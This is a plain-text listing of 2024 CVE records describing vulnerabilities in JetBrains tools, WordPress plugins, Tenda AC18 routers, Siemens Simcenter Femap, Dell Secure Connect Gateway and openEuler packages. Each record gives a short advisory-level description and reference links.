CVE    2024    24943    Candidate    In JetBrains Toolbox App before 2.2 a DoS attack was possible via a malicious SVG image    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240201)
CVE    2024    24942    Candidate    In JetBrains TeamCity before 2023.11.3 path traversal allowed reading data within JAR archives    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240201)
CVE    2024    24941    Candidate    In JetBrains IntelliJ IDEA before 2023.3.3 a plugin for JetBrains Space was able to send an authentication token to an inappropriate URL    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240201)
CVE    2024    24940    Candidate    In JetBrains IntelliJ IDEA before 2023.3.3 path traversal was possible when unpacking archives    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240201)
CVE    2024    2494    Candidate    A flaw was found in the RPC library APIs of libvirt. The RPC server deserialization code allocates memory for arrays before the non-negative length check is performed by the C API entry points. Passing a negative length to the g_new0 function results in a crash due to the negative length being treated as a huge positive number. This flaw allows a local, unprivileged user to perform a denial of service attack by causing the libvirt daemon to crash.    MISC:RHBZ#2270115   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2270115   |   MISC:https://access.redhat.com/security/cve/CVE-2024-2494   |   URL:https://access.redhat.com/security/cve/CVE-2024-2494   |   MISC:https://lists.libvirt.org/archives/list/devel@lists.libvirt.org/thread/BKRQXPLPC6B7FLHJXSBQYW7HNDEBW6RJ/   |   URL:https://lists.libvirt.org/archives/list/devel@lists.libvirt.org/thread/BKRQXPLPC6B7FLHJXSBQYW7HNDEBW6RJ/    Assigned (20240315)
CVE    2024    24939    Candidate    In JetBrains Rider before 2023.3.3 logging of environment variables containing secret values was possible    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240201)
CVE    2024    24938    Candidate    In JetBrains TeamCity before 2023.11.2 limited directory traversal was possible in the Kotlin DSL documentation    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240201)
CVE    2024    24937    Candidate    In JetBrains TeamCity before 2023.11.2 stored XSS via agent distribution was possible    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240201)
CVE    2024    24936    Candidate    In JetBrains TeamCity before 2023.11.2 access control at the S3 Artifact Storage plugin endpoint was missed    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240201)
CVE    2024    24935    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in WpSimpleTools Basic Log Viewer. This issue affects Basic Log Viewer: from n/a through 1.0.4.    MISC:https://patchstack.com/database/vulnerability/wpsimpletools-log-viewer/wordpress-basic-log-viewer-plugin-1-0-4-cross-site-request-forgery-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wpsimpletools-log-viewer/wordpress-basic-log-viewer-plugin-1-0-4-cross-site-request-forgery-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24933    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Prasidhda Malla Honeypot for WP Comment allows Reflected XSS. This issue affects Honeypot for WP Comment: from n/a through 2.2.3.    MISC:https://patchstack.com/database/vulnerability/honeypot-for-wp-comment/wordpress-honeypot-for-wp-comment-plugin-2-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/honeypot-for-wp-comment/wordpress-honeypot-for-wp-comment-plugin-2-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24932    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Djo VK Poster Group allows Reflected XSS. This issue affects VK Poster Group: from n/a through 2.0.3.    MISC:https://patchstack.com/database/vulnerability/vk-poster-group/wordpress-vk-poster-group-plugin-2-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/vk-poster-group/wordpress-vk-poster-group-plugin-2-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24931    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in swadeshswain Before After Image Slider WP allows Stored XSS. This issue affects Before After Image Slider WP: from n/a through 2.2.    MISC:https://patchstack.com/database/vulnerability/before-after-image-slider/wordpress-before-after-image-slider-wp-plugin-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/before-after-image-slider/wordpress-before-after-image-slider-wp-plugin-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24930    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes.Com Buttons Shortcode and Widget allows Stored XSS. This issue affects Buttons Shortcode and Widget: from n/a through 1.16.    MISC:https://patchstack.com/database/vulnerability/buttons-shortcode-and-widget/wordpress-buttons-shortcode-and-widget-plugin-1-16-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/buttons-shortcode-and-widget/wordpress-buttons-shortcode-and-widget-plugin-1-16-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24929    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Ryan Duff, Peter Westwood WP Contact Form. This issue affects WP Contact Form: from n/a through 1.6.    MISC:https://patchstack.com/database/vulnerability/wp-contact-form/wordpress-wp-contact-form-plugin-1-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-contact-form/wordpress-wp-contact-form-plugin-1-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24928    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arunas Liuiza Content Cards allows Stored XSS. This issue affects Content Cards: from n/a through 0.9.7.    MISC:https://patchstack.com/database/vulnerability/content-cards/wordpress-content-cards-plugin-0-9-7-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/content-cards/wordpress-content-cards-plugin-0-9-7-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24927    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UnitedThemes Brooklyn | Creative Multi-Purpose Responsive WordPress Theme allows Reflected XSS. This issue affects Brooklyn | Creative Multi-Purpose Responsive WordPress Theme: from n/a through 4.9.7.6.    MISC:https://patchstack.com/database/vulnerability/brooklyn/wordpress-brooklyn-theme-4-9-7-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/brooklyn/wordpress-brooklyn-theme-4-9-7-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24926    Candidate    Deserialization of Untrusted Data vulnerability in UnitedThemes Brooklyn | Creative Multi-Purpose Responsive WordPress Theme. This issue affects Brooklyn | Creative Multi-Purpose Responsive WordPress Theme: from n/a through 4.9.7.6.    MISC:https://patchstack.com/database/vulnerability/brooklyn/wordpress-brooklyn-theme-4-9-7-6-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/brooklyn/wordpress-brooklyn-theme-4-9-7-6-php-object-injection-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24925    Candidate    A vulnerability has been identified in Simcenter Femap (All versions < V2306.0000). The affected application is vulnerable to uninitialized pointer access while parsing specially crafted Catia MODEL files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-22060)    MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html    Assigned (20240201)
CVE    2024    24924    Candidate    A vulnerability has been identified in Simcenter Femap (All versions < V2306.0000). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted Catia MODEL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-22059)    MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html    Assigned (20240201)
CVE    2024    24923    Candidate    A vulnerability has been identified in Simcenter Femap (All versions < V2401.0000), Simcenter Femap (All versions < V2306.0001). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted Catia MODEL files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-22055)    MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html    Assigned (20240201)
CVE    2024    24922    Candidate    A vulnerability has been identified in Simcenter Femap (All versions < V2401.0000). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted Catia MODEL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21715)    MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html    Assigned (20240201)
CVE    2024    24921    Candidate    A vulnerability has been identified in Simcenter Femap (All versions < V2401.0000). The affected application is vulnerable to memory corruption while parsing specially crafted Catia MODEL files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21712)    MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html    Assigned (20240201)
CVE    2024    24920    Candidate    A vulnerability has been identified in Simcenter Femap (All versions < V2401.0000). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted Catia MODEL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21710)    MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html    Assigned (20240201)
CVE    2024    24907    Candidate    Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain(s) a Stored Cross-Site Scripting Vulnerability in the Filters page. An adjacent network high privileged attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.    MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities    Assigned (20240201)
CVE    2024    24906    Candidate    Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain(s) a Stored Cross-Site Scripting Vulnerability in Policy page. An adjacent network high privileged attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.    MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities    Assigned (20240201)
CVE    2024    24905    Candidate    Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain(s) a Stored Cross-Site Scripting Vulnerability. An adjacent network high privileged attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.    MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities    Assigned (20240201)
CVE    2024    24903    Candidate    Dell Secure Connect Gateway (SCG) Policy Manager, version 5.10+, contain a weak password recovery mechanism for forgotten passwords. An adjacent network low privileged attacker could potentially exploit this vulnerability, leading to unauthorized access to the application with privileges of the compromised account. The attacker could retrieve the reset password token without authorization and then perform the password change.    MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities    Assigned (20240201)
CVE    2024    24901    Candidate    Dell PowerScale OneFS 8.2.x through 9.6.0.x contain an insufficient logging vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability, causing audit messages to be lost and not recorded for a specific time period.    MISC:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities    Assigned (20240201)
CVE    2024    24900    Candidate    Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain an improper authorization vulnerability. An adjacent network low privileged attacker could potentially exploit this vulnerability, leading to unauthorized devices added to policies. Exploitation may lead to information disclosure and unauthorized access to the system.    MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities    Assigned (20240201)
CVE    2024    2490    Candidate    A vulnerability classified as critical was found in Tenda AC18 15.03.05.05. Affected by this vulnerability is the function setSchedWifi of the file /goform/openSchedWifi. The manipulation of the argument schedStartTime/schedEndTime leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256897 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256897 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256897   |   MISC:VDB-256897 | Tenda AC18 openSchedWifi setSchedWifi stack-based overflow   |   URL:https://vuldb.com/?id.256897   |   MISC:https://github.com/Emilytutu/IoT-vulnerable/blob/main/Tenda/AC18/setSchedWifi_end.md   |   URL:https://github.com/Emilytutu/IoT-vulnerable/blob/main/Tenda/AC18/setSchedWifi_end.md    Assigned (20240315)
CVE    2024    24899    Candidate    Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in openEuler aops-zeus on Linux allows Command Injection. This vulnerability is associated with program files https://gitee.Com/openeuler/aops-zeus/blob/master/zeus/conf/constant.Py. This issue affects aops-zeus: from 1.2.0 through 1.4.0.    MISC:https://gitee.com/src-openeuler/aops-zeus/pulls/107   |   URL:https://gitee.com/src-openeuler/aops-zeus/pulls/107   |   MISC:https://gitee.com/src-openeuler/aops-zeus/pulls/108   |   URL:https://gitee.com/src-openeuler/aops-zeus/pulls/108   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1291   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1291   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1292   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1292   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1293   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1293   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1294   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1294    Assigned (20240201)
CVE    2024    24897    Candidate    Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in openEuler A-Tune-Collector on Linux allows Command Injection. This vulnerability is associated with program files https://gitee.Com/openeuler/A-Tune-Collector/blob/master/atune_collector/plugin/monitor/process/sched.Py. This issue affects A-Tune-Collector: from 1.1.0-3 through 1.3.0.    MISC:https://gitee.com/src-openeuler/A-Tune-Collector/pulls/45   |   URL:https://gitee.com/src-openeuler/A-Tune-Collector/pulls/45   |   MISC:https://gitee.com/src-openeuler/A-Tune-Collector/pulls/47   |   URL:https://gitee.com/src-openeuler/A-Tune-Collector/pulls/47   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1271   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1271   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1273   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1273    Assigned (20240201)
CVE    2024    24892    Candidate    Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Improper Privilege Management vulnerability in openEuler migration-tools on Linux allows Command Injection, Restful Privilege Elevation. This vulnerability is associated with program files https://gitee.Com/openeuler/migration-tools/blob/master/index.Py. This issue affects migration-tools: from 1.0.0 through 1.0.1.    MISC:https://gitee.com/src-openeuler/migration-tools/pulls/12   |   URL:https://gitee.com/src-openeuler/migration-tools/pulls/12   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1275   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1275    Assigned (20240201)
CVE    2024    24890    Candidate    Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in openEuler gala-gopher on Linux allows Command Injection. This vulnerability is associated with program files https://gitee.Com/openeuler/gala-gopher/blob/master/src/probes/extends/ebpf.Probe/src/ioprobe/ioprobe.C. This issue affects gala-gopher: through 1.0.2.    MISC:https://gitee.com/src-openeuler/gala-gopher/pulls/81   |   URL:https://gitee.com/src-openeuler/gala-gopher/pulls/81   |   MISC:https://gitee.com/src-openeuler/gala-gopher/pulls/82   |   URL:https://gitee.com/src-openeuler/gala-gopher/pulls/82   |   MISC:https://gitee.com/src-openeuler/gala-gopher/pulls/85   |   URL:https://gitee.com/src-openeuler/gala-gopher/pulls/85   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1277   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1277   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1278   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1278   |   MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1279   |   URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1279    Assigned (20240201)
CVE    2024    2489    Candidate    A vulnerability classified as critical has been found in Tenda AC18 15.03.05.05. Affected is the function formSetQosBand of the file /goform/SetNetControlList. The manipulation of the argument list leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256896. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256896 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256896   |   MISC:VDB-256896 | Tenda AC18 SetNetControlList formSetQosBand stack-based overflow   |   URL:https://vuldb.com/?id.256896   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetQosBand.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetQosBand.md    Assigned (20240315)
CVE    2024    24889    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Geek Code Lab All 404 Pages Redirect to Homepage allows Stored XSS. This issue affects All 404 Pages Redirect to Homepage: from n/a through 1.9.    MISC:https://patchstack.com/database/vulnerability/all-404-pages-redirect-to-homepage/wordpress-all-404-pages-redirect-to-homepage-plugin-1-9-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/all-404-pages-redirect-to-homepage/wordpress-all-404-pages-redirect-to-homepage-plugin-1-9-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24887    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Contest Gallery Photos and Files Contest Gallery – Contact Form, Upload Form, Social Share and Voting Plugin for WordPress. This issue affects Photos and Files Contest Gallery – Contact Form, Upload Form, Social Share and Voting Plugin for WordPress: from n/a through 21.2.8.4.    MISC:https://patchstack.com/database/vulnerability/contest-gallery/wordpress-photos-and-files-contest-gallery-plugin-21-2-8-4-csrf-leading-to-gallery-creation-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/contest-gallery/wordpress-photos-and-files-contest-gallery-plugin-21-2-8-4-csrf-leading-to-gallery-creation-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24886    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Acowebs Product Labels For Woocommerce (Sale Badges) allows Stored XSS. This issue affects Product Labels For Woocommerce (Sale Badges): from n/a through 1.5.3.    MISC:https://patchstack.com/database/vulnerability/aco-product-labels-for-woocommerce/wordpress-product-labels-for-woocommerce-sale-badges-plugin-1-5-3-authenticated-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/aco-product-labels-for-woocommerce/wordpress-product-labels-for-woocommerce-sale-badges-plugin-1-5-3-authenticated-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24885    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lê Văn Toản Woocommerce Vietnam Checkout allows Stored XSS. This issue affects Woocommerce Vietnam Checkout: from n/a through 2.0.7.    MISC:https://patchstack.com/database/vulnerability/woo-vietnam-checkout/wordpress-woocommerce-vietnam-checkout-plugin-2-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/woo-vietnam-checkout/wordpress-woocommerce-vietnam-checkout-plugin-2-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24884    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in ARI Soft Contact Form 7 Connector. This issue affects Contact Form 7 Connector: from n/a through 1.2.2.    MISC:https://patchstack.com/database/vulnerability/ari-cf7-connector/wordpress-contact-form-7-connector-plugin-1-2-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ari-cf7-connector/wordpress-contact-form-7-connector-plugin-1-2-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24883    Candidate    Missing Authorization vulnerability in BdThemes Prime Slider – Addons For Elementor. This issue affects Prime Slider – Addons For Elementor: from n/a through 3.11.10.    MISC:https://patchstack.com/database/vulnerability/bdthemes-prime-slider-lite/wordpress-prime-slider-plugin-3-11-10-broken-access-control-on-duplicate-post-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/bdthemes-prime-slider-lite/wordpress-prime-slider-plugin-3-11-10-broken-access-control-on-duplicate-post-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24881    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc allows Reflected XSS. This issue affects WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n/a through 6.5.2.    MISC:https://patchstack.com/database/vulnerability/wp-sms/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-sms/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24880    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apollo13Themes Apollo13 Framework Extensions allows Stored XSS. This issue affects Apollo13 Framework Extensions: from n/a through 1.9.2.    MISC:https://patchstack.com/database/vulnerability/apollo13-framework-extensions/wordpress-apollo13-framework-extensions-plugin-1-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/apollo13-framework-extensions/wordpress-apollo13-framework-extensions-plugin-1-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    2488    Candidate    A vulnerability was found in Tenda AC18 15.03.05.05. It has been rated as critical. This issue affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation of the argument startIP leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256895. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256895 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256895   |   MISC:VDB-256895 | Tenda AC18 SetPptpServerCfg formSetPPTPServer stack-based overflow   |   URL:https://vuldb.com/?id.256895   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetPPTPServer.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetPPTPServer.md    Assigned (20240315)
CVE    2024    24879    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yannick Lefebvre Link Library allows Reflected XSS. This issue affects Link Library: from n/a through 7.5.13.    MISC:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24878    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PT Woo Plugins (by Webdados) Portugal CTT Tracking for WooCommerce allows Reflected XSS. This issue affects Portugal CTT Tracking for WooCommerce: from n/a through 2.1.    MISC:https://patchstack.com/database/vulnerability/portugal-ctt-tracking-woocommerce/wordpress-portugal-ctt-tracking-for-woocommerce-plugin-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/portugal-ctt-tracking-woocommerce/wordpress-portugal-ctt-tracking-for-woocommerce-plugin-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24877    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magic Hills Pty Ltd Wonder Slider Lite allows Reflected XSS. This issue affects Wonder Slider Lite: from n/a through 13.9.    MISC:https://patchstack.com/database/vulnerability/wonderplugin-slider-lite/wordpress-wonder-slider-lite-plugin-13-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wonderplugin-slider-lite/wordpress-wonder-slider-lite-plugin-13-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24876    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Janis Elsts Admin Menu Editor. This issue affects Admin Menu Editor: from n/a through 1.12.    MISC:https://patchstack.com/database/vulnerability/admin-menu-editor/wordpress-admin-menu-editor-plugin-1-12-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/admin-menu-editor/wordpress-admin-menu-editor-plugin-1-12-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24875    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Yannick Lefebvre Link Library. This issue affects Link Library: from n/a through 7.5.13.    MISC:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24872    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Themify Themify Builder. This issue affects Themify Builder: from n/a through 7.0.5.    MISC:https://patchstack.com/database/vulnerability/themify-builder/wordpress-themify-builder-plugin-7-0-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/themify-builder/wordpress-themify-builder-plugin-7-0-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24871    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative Themes Blocksy allows Stored XSS. This issue affects Blocksy: from n/a through 2.0.19.    MISC:https://patchstack.com/database/vulnerability/blocksy/wordpress-blocksy-theme-2-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/blocksy/wordpress-blocksy-theme-2-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
